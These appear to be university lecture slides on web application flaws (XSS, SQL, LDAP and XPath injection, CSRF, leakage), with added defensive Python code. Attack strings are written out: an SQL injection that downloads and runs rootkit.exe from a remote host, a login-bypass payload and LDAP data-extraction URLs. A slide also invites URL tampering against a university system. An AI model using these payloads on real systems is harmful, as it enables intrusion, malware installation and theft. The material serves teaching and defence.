Cross site scripting attack (CSS or XSS): injecting a malicious script into one site so that it runs in other users' browsers and compromises their data.
Demo:
http://www.tipicalcharlie.com/index.cfm?search=%3Cscript%3Ealert%28window.location%29%3B%3C%2Fscript%3E
Injection flaws
- Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application.
- In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.
Real-world example: Russian hackers broke into a Rhode Island government website to steal credit card data in January 2006. The hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claimed it was only 4,113.
How to protect users: Avoid using interpreters if possible. If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries.
SQL Injection Attack
When user input is used in an SQL query and the user input is not validated, the SQL server can be attacked. Often the data for dynamically produced web pages is stored in an SQL database. The data is retrieved using SQL and added to static information to display to the web user. Most e-commerce applications use this model. User information is stored in a database along with the product catalog, user orders, order status, etc.
SQL Injection
Consider the following VBScript query:

```vbscript
Query1 = "INSERT INTO Records (Name, CardNum) VALUES ('" & Request.Form("Username") & "', '" & Request.Form("CreditCard") & "')"
```

This query takes several inputs from forms filled in by the user. Normally CardNum would contain a credit card number like 560545334506. However, if a crafted CardNum was entered and no input validation is done, the query could be hijacked as follows:

```sql
INSERT INTO Records (Name, CardNum) VALUES ('Username', '1'); EXEC xp_cmdshell 'echo open 111.22.3.45 4444 > o& echo get rootkit.exe>>o&echo bye>>o&ftp -i -n -s:o&rootkit.exe')
```

If this SQL server were running on Windows, the crafted string above would result in the SQL server downloading the file rootkit.exe from the ftp site at 111.22.3.45 and executing it.
Other attack approaches of this type include modifying the SQL to return the password table for the database, altering the sa account password, or creating an admin-level account with a password of the attacker's choosing. The attacker may also use the sa account to alter web pages so the attacker can steal user credentials when they log in. To prevent this kind of attack, the user input must be stripped of characters and strings that could be malicious. The input validation must be done on the server side, since client-side validation can be bypassed.
Authentication Bypass Exploit:
Consider a login form that accepts a username and password and then executes the following SELECT to check the credentials:

```sql
SELECT * FROM tblUsers WHERE username = 'jeff' AND password = 'Trickey'
```

However, what if the user entered something besides a password in that input form, and instead entered an SQL command?

Username: jeff
Password: x' OR '1'='1
The application might then create a SQL statement such as the following:

```sql
SELECT * FROM tblUsers WHERE username = 'jeff' AND password = 'x' OR '1'='1'
```
Injection attacks are an attempt by an attacker to manipulate query data to modify query logic for malicious purposes. In this instance, a true condition has been included instead of a valid password, effectively bypassing the authentication mechanism and giving the attacker unauthorized access to the application.
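The bypass above, rebuilt as an added Python example (not code from the slides) against an in-memory SQLite table standing in for tblUsers. It contrasts the concatenated query with the parameterized query the slides recommend; the table, the jeff/Trickey row and the clear-text password storage are constructed to mirror the slide, not a recommendation.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the slide's tblUsers, with one known account.
    The password is stored in clear text only to mirror the slide's query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblUsers (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tblUsers VALUES ('jeff', 'Trickey')")
    conn.commit()
    return conn

def vulnerable_login(conn, username, password):
    """Builds the SELECT by string concatenation, as the slide's application does.
    A quote in the input terminates the literal and the rest is parsed as SQL."""
    sql = ("SELECT * FROM tblUsers WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None

def safe_login(conn, username, password):
    """Parameterized query (the 'safe API' the slides recommend): the values travel
    separately from the SQL text, so the OR clause is compared as a password string."""
    sql = "SELECT * FROM tblUsers WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def demo():
    conn = make_db()
    bypass = "x' OR '1'='1"   # the slide's crafted password
    return {
        "vulnerable_with_bypass": vulnerable_login(conn, "jeff", bypass),
        "safe_with_bypass": safe_login(conn, "jeff", bypass),
        "safe_with_real_password": safe_login(conn, "jeff", "Trickey"),
        "safe_with_wrong_password": safe_login(conn, "jeff", "guess"),
    }

if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {'logged in' if result else 'rejected'}")
```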
Injection Attacks
Any other query or command language that accepts user input can also be susceptible to injection attacks. LDAP, JavaScript, XPath, command shells: as long as they accept unsanitized user input, they can be exploited.
LDAP Injection
Suppose there is a web interface to do LDAP searches for names, email addresses and telephone numbers. A normal URL might be:
http://tim.ncsu.edu/ldap-search.asp?user=amridgley

User information for: Amber Ridgley
Cn: Amber Ridgley
Mail: amridgley@ncsu.edu
TelephoneNumber: 919-555-4242
In the ldap-search.asp function, the real query behind http://tim.ncsu.edu/ldap-search.asp?user=amridgley is:

userName = amridgley
Filter = (uid=amridgley)
Search base = ou=people,dc=tim,dc=ncsu.edu
LDAP search filter = (uid=amridgley)
LDAP search attributes = cn, mail, telephoneNumber

Note: the filter is (uid=user_supplied_value), so whatever the user typed goes straight into the filter.
To find out if your application is vulnerable, an attacker might send these URLs:
http://tim.ncsu.edu/ldap-search.asp?user=amridgley)
http://tim.ncsu.edu/ldap-search.asp?user=amridgley|
http://tim.ncsu.edu/ldap-search.asp?user=amridgley%26
If the application doesn't return an error, but simply returns no data, the attacker knows there is no validation being done.
Next an attacker might try to get more data than the application is supposed to return:
http://tim.ncsu.edu/ldap-search.asp?user=amridgley)(|(objectclass=*)

User information for: top
Objectclass: top
: person
: organizationalPerson
: uid
: uidnumber
: gidnumber
: posixAccount
The posixAccount objectclass could contain interesting information:
http://tim.ncsu.edu/ldap-search.asp?user=amridgley)(|(homedirectory=*)

User information for: /home/amridgley
homedirectory: /home/amridgley
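The fix for the ldap-search.asp filter, as an added Python example (not the slides' code): escape the value per RFC 4515 before placing it in (uid=...), and check that the finished filter still has the shape of a single assertion. The probe value is the one from the slides; the function names are my own.

```python
# RFC 4515 escaping for values inserted into an LDAP search filter.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_filter_value(value):
    """Replace the characters RFC 4515 treats as special inside an assertion value,
    so that whatever the user typed is matched literally against uid."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)

def build_uid_filter_unsafe(user):
    """The slide's construction: user input concatenated straight into the filter."""
    return "(uid=%s)" % user

def build_uid_filter(user):
    """Hardened construction: same filter shape, escaped value."""
    return "(uid=%s)" % escape_filter_value(user)

def count_unescaped_parens(filter_text):
    """Count '(' and ')' that are not part of a \\XX escape sequence. A filter built
    from one assertion should contain exactly two; more means the input changed the
    filter's structure, which is what the slide's probes rely on."""
    count, i = 0, 0
    while i < len(filter_text):
        if filter_text[i] == "\\":
            i += 3          # skip the backslash and the two hex digits
            continue
        if filter_text[i] in "()":
            count += 1
        i += 1
    return count

if __name__ == "__main__":
    probe = "amridgley)(|(objectclass=*)"   # the slide's data-extraction probe
    for build in (build_uid_filter_unsafe, build_uid_filter):
        f = build(probe)
        print(f"{build.__name__}: {f}  parens={count_unescaped_parens(f)}")
```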
XPath Injection
Suppose there is an application displaying a catalog of parts:
The XML contains:

```xml
<products>
  <product catalogNumber="aaa123">
    <name>Blue Sprocket</name>
    <price>4.00</price>
    <cost>1.50</cost>
  </product>
</products>
```

So the XPath search is:

```xpath
/products/product[@catalogNumber='aaa123']
```
To determine that an application is vulnerable to XPath injection, the first step is to append information to the Part Number that is always true.
The fact that the application still returned valid data is evidence that the application accepted the additional information and processed it as part of the query.
Next an attacker enters a query that will always be false:
Since the query clause 1 = 2 will never be true, this query returns no results. The attacker now knows what the application's response will be to a false question as well as to a true question. Now he can ask any question he wants and understand the answer.
So, to determine the number of nodes in the data, an attacker might try this:
If the response is the true response, the number of nodes is 2. If it is false, try again with node = 3 and keep guessing from there.
As you can see, an attacker can determine the structure of the data and view it by adding XPath commands to the part number.
XPath does not utilize access control restrictions as SQL does via privileges, so a successful XPath Injection attack can yield complete results in that all the data in the document will be revealed.
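The probing described in the LDAP and XPath sections leaves a recognisable trace in web server logs. This added Python example (not from the slides) scans constructed access-log lines for the probe shapes the slides describe: LDAP filter metacharacters in a parameter value, the quote-plus-boolean true/false oracle, and count(//...) node enumeration. The log lines, client addresses and the /parts.asp?part= path are assumptions; the slides name no URL for the parts catalog.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines modelled on the slides' probe URLs; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2007:10:00:00] "GET /ldap-search.asp?user=amridgley HTTP/1.1" 200
10.0.0.9 - - [01/Jan/2007:10:00:05] "GET /ldap-search.asp?user=amridgley) HTTP/1.1" 200
10.0.0.9 - - [01/Jan/2007:10:00:09] "GET /ldap-search.asp?user=amridgley)(|(objectclass=*) HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2007:10:01:00] "GET /parts.asp?part=aaa123 HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2007:10:01:03] "GET /parts.asp?part=aaa123'%20or%201=2 HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2007:10:01:06] "GET /parts.asp?part=aaa123'%20or%20count(//product)=2 HTTP/1.1" 200
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

# Each rule is (name, predicate over one decoded query-parameter value).
RULES = [
    # LDAP filter metacharacters: the probes close the (uid=...) assertion or OR in a new one.
    ("ldap-metachar", lambda v: re.search(r"[()|*]", v) is not None),
    # XPath true/false oracle: a quote followed by "or 1=1", "and 1=2" and the like.
    ("xpath-boolean-probe", lambda v: re.search(r"'\s*(or|and)\s+\d+\s*=\s*\d+", v, re.I) is not None),
    # XPath structure enumeration: count(//...) injected to learn the number of nodes.
    ("xpath-count-probe", lambda v: re.search(r"count\s*\(\s*//", v, re.I) is not None),
]

def scan_log(text):
    """Return one (client, path, parameter, rule) tuple per rule hit on each request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, url = m.groups()
        parts = urlsplit(url)
        # parse_qsl percent-decodes the values, so %20 and %26 are inspected as the
        # characters the application would actually see.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            for rule, matches in RULES:
                if matches(value):
                    hits.append((client, parts.path, name, rule))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s?%s matched %s" % hit)
```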
What happens if you GET the URL above and then change it to https://submit.ncsu.edu/wrap-bin/submit_admin/csc:405::001:8:2007? Can you access the submit locker for classes where you are not on the support list?
Cross site request forgery
How to protect users: Don't rely on credentials or tokens automatically submitted by browsers. The only solution is to use a custom token that the browser will not remember.
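One way to implement the custom token the slide calls for, as an added Python example (not the slides' code): derive a per-session token with an HMAC over the session identifier, deliver it only in the page body (a hidden form field, never a cookie), and require it on every state-changing POST. The server secret, session identifiers and handler are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret; in production it is loaded from configuration.
SERVER_SECRET = secrets.token_bytes(32)

def make_csrf_token(session_id, secret=SERVER_SECRET):
    """Token bound to one session: HMAC(secret, session_id). Another site cannot
    compute it, and because it is never set as a cookie the browser never sends it
    on its own."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf_token(session_id, submitted, secret=SERVER_SECRET):
    """Recompute the token for the session that carried the request and compare
    in constant time, so a missing or wrong token is rejected without a timing leak."""
    expected = make_csrf_token(session_id, secret)
    return hmac.compare_digest(expected, submitted or "")

def handle_form_post(session_id, form):
    """Minimal handler: the cookie-identified session must also present the token
    that was embedded in the form the server rendered for it."""
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return "403 rejected: missing or wrong CSRF token"
    return "200 accepted"

def demo():
    victim_session = "sess-victim-001"   # constructed session identifier
    # Form rendered by the server for the victim's session carries the matching token.
    good = {"action": "transfer", "csrf_token": make_csrf_token(victim_session)}
    # A form hosted elsewhere: the browser attaches the victim's cookie automatically,
    # but the submitted form has no token, or a token for some other session.
    forged = {"action": "transfer"}
    wrong_session = {"action": "transfer", "csrf_token": make_csrf_token("sess-other-999")}
    return (handle_form_post(victim_session, good),
            handle_form_post(victim_session, forged),
            handle_form_post(victim_session, wrong_session))

if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```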
Problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program's configuration and internal workings.
Information Leakage
How to protect users: Use a testing tool such as OWASP's WebScarab Project to see what errors your application generates. Applications that have not been tested in this way will almost certainly generate unexpected error output.
How to protect users: Use a fuzzing tool.
Fuzzing is an automated software testing technique that generates and submits random or sequential data to various areas of an application in an attempt to uncover security vulnerabilities.
Fuzzing
Fuzzing can be used to test variations of input such as:
- resource path: /folder/file.html
- resource file: /folder/file.html
- resource file extension: /folder/file.html
- resource and query delimiter: /folder/file.html?parameter=value
- parameter name: /folder/file.html?parameter=value
- parameter name value assignment: /folder/file.html?parameter=value
- parameter value: /folder/file.html?parameter=value
- parameter separator: /folder/file.html?parameter=value&parameter2=value2
Fuzzers can also vary the:
- Method
- Request-URI
- Protocol version
- Header fields
- Cookies
Information Leakage
If an attacker sends a crafted SQL query to a database server, the resulting error message can often reveal the name of the script, which the attacker can then use in an attack. The error could also reveal the path to the script's directory, which is also needed for a successful attack.
Another common method employed for mapping the web server file space is to craft URLs to see if the server outputs a different error when a file exists but is not permitted to be viewed versus when the file doesn't exist at all. For example, if the server outputs "access denied" for a file that exists but isn't supposed to be viewed, versus "file not found" if the file really isn't there, the attacker can craft URLs to determine which directory stores a given file that may be vulnerable.
Problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.
Cookies
HTTP is a stateless protocol. Cookies are used to record the state of a connection between client and server across several HTTP requests. Instead of the server trying to track the connection state, the server provides cookie data for the client to store. The server specifies the cookie name.
The cookie size is limited to 4 KB. The server may store some information on the server side, and the cookie may be some type of index into the server session information. Cookies are associated with a domain. A cookie created by server1.yahoo.com can be accessed by server5.yahoo.com because they have the same root domain.
These flaws can lead to disclosure of sensitive data and compliance violations if database tables are dumped or data leakage occurs in a URL or error message.
Insecure Communications
Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and a laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers.
How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.